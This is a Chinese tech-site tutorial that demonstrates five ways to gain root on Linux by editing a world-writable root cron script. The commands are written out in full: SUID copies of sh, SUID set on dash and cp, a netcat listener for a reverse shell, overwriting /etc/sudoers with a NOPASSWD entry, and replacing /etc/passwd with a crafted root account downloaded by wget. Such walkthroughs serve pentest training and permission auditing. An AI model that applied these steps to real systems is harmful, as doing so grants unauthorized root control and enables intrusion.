51CTO首页
AI.x社区
博客
学堂
精品班
直播训练营
企业培训
鸿蒙开发者社区
WOT技术大会
AIGC创新中国行
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术2024年软考PMP项目管理软考资讯
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO题库小程序
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
账号设置 退出

在Linux上通过可写文件获取Root权限的多种方式

作者:secist 编译
系统 Linux 安全
在Linux中,一切都可以看做文件,包括所有允许/禁止读写执行权限的目录和设备。当管理员为任何文件设置权限时,都应清楚并合理为每个Linux用户分配应有的读写执行权限。在本文中我将为大家展示,如何利用Linux中具有写入权限的文件/脚本来进行提权操作。

在Linux中,一切都可以看做文件,包括所有允许/禁止读写执行权限的目录和设备。当管理员为任何文件设置权限时,都应清楚并合理为每个Linux用户分配应有的读写执行权限。在本文中我将为大家展示,如何利用Linux中具有写入权限的文件/脚本来进行提权操作。好了,话不多说。下面就进入我们的正题吧!

首先,我们来启动我们的攻击机并渗透进目标系统直至提权阶段。这里假设我通过ssh成功登录到了受害者机器,并访问了非root用户的终端。通过以下命令,我们可以枚举所有具有可写权限的二进制文件。

  1. find / -writable -type  f 2>/dev/null | grep -v "/proc/" 

可以看到在/lib/log路径下有一个python文件,我们进入到该目录并查看该文件的权限为777 

通过cat命令查看该文件内容,这是管理员添加的一个用来清除 /tmp中的所有垃圾文件的脚本,具体执行取决于管理员设置的定时间隔。获取了这些信息后,攻击者可以通过以下方式来执行提权操作。 

方法1

我们复制了/bin/sh到/tmp下并为/tmp/sh启用了SUID。使用编辑器打开sanitizer.py并将 “rm -r /tmp/*” 中的内容替换为以下两行: 

  1. os.system('cp /bin/sh /tmp/sh'
  2. os.system('chmod u+s /tmp/sh'

 

一段时间后,它将在/tmp目录内创建一个具有SUID权限的sh文件,当你运行它时,你将会获取root访问权限。 

  1. cd /tmp 
  2. ls 
  3. ./sh 
  4. id 
  5. whoami 

下图可以说明一切! 

方法2

同样,你也可以将 “rm -r /tmp/*” 替换为以下内容:

  1. os.system(‘chmod u+s /bin/dash) 

 

一段时间后,它将为/bin/dash设置SUID权限,并且在运行时会给予root访问权限。 

  1. /bin/dash 
  2. id 
  3. whoami 

如下图所示: 

方法3

在这种方法中,我们在 rm -r /tmp/* 的位置粘贴了python反向shell连接代码,并在新的终端中启动了netcat侦听。 

如上所述,经过一段时间后,我们通过netcat获取了具有root访问权限的反向shell。 

  1. nc -lvp 1234 
  2. id 
  3. whoami 

如下图所示: 

方法4

这个方法挺有意思的,在下图中大家可以看到我当前的用户是没有执行sudo命令的权限的。那我们就想办法让自己成为suoders文件成员。 

同样,我们将 “rm -r /tmp/*” 替换为以下内容:

  1. os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers'

 

过一段时间后,当你输入“sudo -l”命令时,你会注意到,它已成为了sudo用户的成员。此时我们只要输入“sudo bash”就可以获取root访问权限。 

  1. sudo -l 
  2. sudo bash 
  3. id 

方法5

我们知道passwd在任何类linux的系统中都扮演着非常重要的角色,一旦攻击者有机会可以修改此文件,那么它将会成为一种特权提升的动态方式。

同样,我们也不会忽视这一点,使用cat命令读取etc/passwd文件。

在这里你可以观察到用户名为nemo记录的高亮条目,根据我的猜测UID:1000 & GID:1000表示它应该是管理员组的成员。

但我们的目标是通过编辑nemo记录,使其成为root组的成员。因此,我们选择并复制etc/passwd文件内的所有记录,然后将它粘贴到一个空的文本文件中。 

然后在一个新的终端中使用openssl生成一个加盐密码并复制。

  1. openssl passwd -1 -salt abc 123 

 

现在将上面复制的加盐密码粘贴至用户nemo记录条目中的“X”处,并且将UID&GID更改为0,如图所示。操作完成后,将文本文件保存为“passwd”,将该文件传输至目标系统,它将覆盖原始passwd文件的内容。

 

  1. cd Desktop 
  2. python -m SimpleHTTPServer 80 

 

同样,将 “rm -r /tmp/*” 替换为以下内容:

  1. os.system(‘chmod u+s /bin/cp) 

一段时间后,它会启用/bin/cp的SUID位以复制任意文件。 

现在将被你修改过的passwd文件下载至目标系统的/tmp目录中。让我们来检查一下/bin/cp是否启用了SUID位,然后使用cp命令将修改的passwd文件复制到/etc/passwd中,这将覆盖原始passwd文件的内容。 

  1. cd /tmp 
  2. wget http://192.168.1.103/passwd 
  3. ls -al /bin/cp 
  4. cp passwd /etc/passwd 

 

现在,我们键入以下命令查看修改内容是否已在passwd文件中生效。

  1. tail /etc/passwd 

可以看到修改内容已成功写入! 

执行以下命令获取root访问权限: 

  1. su nemo 
  2. password 123 
  3. whoami 

 

责任编辑:未丽燕 来源: FreeBuf
权限文件Root
相关推荐
通过可写文件获取Linux root权限5种方法
Linux系统中,全部都是以文件形式存在的,包括目录、设备都是有权限的,共有读、写、可执行三种。管理员为文件设置好权限后,应该要考虑哪些Linux用户会被允许和限制上述的三个权限。

2018-06-22 10:18:52

Linux内核爆安全漏洞 可通过exploit获取root权限
最近Linux内核爆出了一个严重的安全漏洞,非root用户可以通过该漏洞的exploit获取root权限。这并不罕见,值得一提的是这个补丁看起来如此平常以至于我们绝大多数人都不会以为这是安全问题。

2013-07-11 09:51:15

修复 Linux 文件权限错误
不要让文件权限拖你后腿。以下是在Linux和macOS上管理它们的方法。

2022-08-14 19:27:16

LinuxmacOS
NetGear路由器可以通过命令注入获取ROOT权限
国外某大牛研究发现,NetGear路由器wndr3700v4的固件存在认证漏洞。一旦Web界面认证绕过了,后续可以做的事情就会很多。

2013-11-01 11:32:49

PHP获取IP多种方式解析
大街也许对PHP获取IP的具体方法还不是很清楚,没关系,今天我们就在文章中总结了六种实现方式,下面让么一起来看看这六种方式的具体代码吧。

2009-11-23 17:16:54

PHP获取IP
Linux内核超级权限用户root
由tree命令的输出结果来看,最顶端应该是,我们称为Linux内核系统的root,也就是Linux操作系统的文件系统。Linux内核系统的入口就是,所有的目录、文件、设备都在之下,就是Linux内核系统的组织者,也是最上级的领导者。下面我们把Linux内核系统的树形结构的主要目录列一下,主要

2010-03-03 14:17:02

Linux内核
Linux 给用户赋予指定目录读写权限
在本篇文章中,我们将向您介绍如何将Linux上指定目录的读写权限赋予用户。

2017-05-10 15:16:29

Linux系统目录读写指定目录
如何通过网络共享 iOS 和 Android 访问 Linux 文件
网络共享是在同一网络上的设备之间共享文件、文件夹或整个驱动器的一种非常简便的方式。让我们学习如何通过网络共享在Android和iOS上访问您的Linux文件。

2023-09-03 18:55:51

浅析通过全面删除Linux系统Oracle文件方式卸载Oracle数据库
本文简单论述了通过全面删除Linux系统上Oracle文件的方式来卸载Oracle数据库的方法,这种方法操作简单而且卸载彻底,在这里拿出来跟读者分享,希望会对读者有所帮助。

2011-07-04 13:36:26

linuxOracle
Linux给用户赋予指定目录读写权限
在上篇文章中我们向您展示了如何在Linux上创建一个共享目录。这次,我们会为您介绍如何将Linux上指定目录的读写权限赋予用户。

2017-05-08 17:20:01

Linux指定目录读写权限
实现Linux系统下文件可写但不可删除要求 
同时运用了POSIXACL........

2009-07-06 18:36:21

linux要求可写但不可删
linux开放超级权限 root密码修改
以下是linux开放超级权限,root密码修改的方法......

2010-01-27 09:56:31

linux超级权限root密码
VirtualBox安装Kali Linux最安全快捷方式
本教程将向你展示如何以最快的方式在运行于Windows和Linux上的VirtualBox上安装KaliLinux。

2019-02-19 10:30:29

VirtualBoxKali Linux虚拟机
如何通过SSH远程Linux系统运行命令
我们有时可能需要在远程机器上运行一些命令。如果只是偶尔进行的操作,要实现这个目的,可以登录到远程系统上直接执行命令。但是每次都这么做的话,就有点烦人了。既然如此,有没有摆脱这种麻烦操作的更佳方案?

2019-10-09 16:50:48

SSHLinux远程系统
通过 SSH 远程 Linux 系统执行命令
通过安全的网络连接在远程计算机上调用命令或程序。

2022-11-18 08:55:33

10款你可以通过WineLinux游戏
Linux确实能玩游戏,而且还能玩不少游戏。独立游戏在Linux平台上蓬勃发展,顶级的独立游戏也常常会在发售首日便发布Linux版本。然而,3A游戏大作的开发者们却常常忽略Linux,所以你不会很快就能玩上身边朋友们谈论正火的那些游戏。

2019-03-31 08:50:44

LinuxWine游戏
通过任意文件覆盖漏洞直接获取系统操作最高权限
任意文件覆盖一直被视为关键漏洞,因为它可能导致权限升级。

2020-10-12 09:46:34

漏洞
Linux创建文件10个方法
我下面将会介绍多个在Linux上创建文件的方法。我建议你选择几个简单高效的来辅助你的工作。你不必安装下列的任何一个命令,因为它们已经作为Linux核心工具的一部分安装到你的系统上了。

2019-02-19 09:00:45

Linux创建文件命令
Linux 查看文件内容 5 种方法
如何使用cat、more、head和tail命令查看Linux文件的内容,而不仅仅是文本文件。

2020-06-23 14:21:35

Linux系统功能
Linux爆出漏洞 黑客轻松获得Root权限
Linux操作系统最近被找出两个漏洞,一个是与甲骨文所贡献的RDS协定有关,另一个则与GNUC的数据库有关,均可能让入侵的黑客取得Linux系统的最高管理人员权限,目前这RDS漏洞已经由Linux之父LinusTorvalds进行修改。

2010-10-27 09:48:10

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服